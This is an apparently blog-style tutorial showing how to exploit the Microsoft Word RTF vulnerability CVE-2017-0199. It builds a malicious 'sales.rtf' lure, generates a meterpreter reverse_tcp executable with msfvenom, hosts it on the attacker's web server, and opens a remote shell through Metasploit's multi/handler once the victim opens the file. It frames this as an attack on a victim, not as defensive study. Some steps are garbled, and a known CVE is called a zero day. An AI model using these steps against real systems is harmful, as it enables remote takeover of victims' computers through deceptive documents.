Microsoft
word is vulnerable against malicious RTF file, in this article we had made a zero
day attack on MS- word 2013 using python script which will generate a malicious
.rtf file and give meterpreter session of targeted system.
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python
script which provides a quick and effective way to exploit Microsoft RTF RCE.
It could generate a malicious RTF file and deliver metasploit / meterpreter /
any other payload to victim without any complex configuration.
Let’s start!!!
Attacker: Kali Linux
Target: Windows 10 (Microsoft
Word 2007 - 2013)
Open the terminal inside
your kali Linux and type following to down this script.
Cd CVE-2017-0199
This command will run a python script to generate a rich text format payload
where –M is used for generating rtf
file –w is used for name of rtf file
i.e. “sales.rtf” and –u for attacker’s IP address or domain
name.
As you can figure out in the given screenshot that above
command has generated a malicious sales .rtf
file, now before we send this file to our victim we need to connect it with any
backdoor file so that we can establish reverse connect with victim.
On a new terminal use msfvenom to prepare an exe payload
for attack and type following.
Msfvenom –p
windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 –f exe >
/root/Desktop/raj.exe
Now move raj.exe into /var/www/html.
Now type following command where it will merge raj.exe
with sales.rtf. Then you have to share the updated rtf file with victim and start multi handler simultaneously for
reverse connection of victims.
When victim will open sales file which will be in doc format
in that mean time attacker will receive his meterpreter ssession inside
metasploite framework.
msf > use multi/handler
msf exploit(handler)
> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)
> set lhost 192.168.1.24
msf exploit(handler)
> set lport 4444
msf exploit(handler)
> exploit
meterpreter > sysinfo
0 comments:
Post a Comment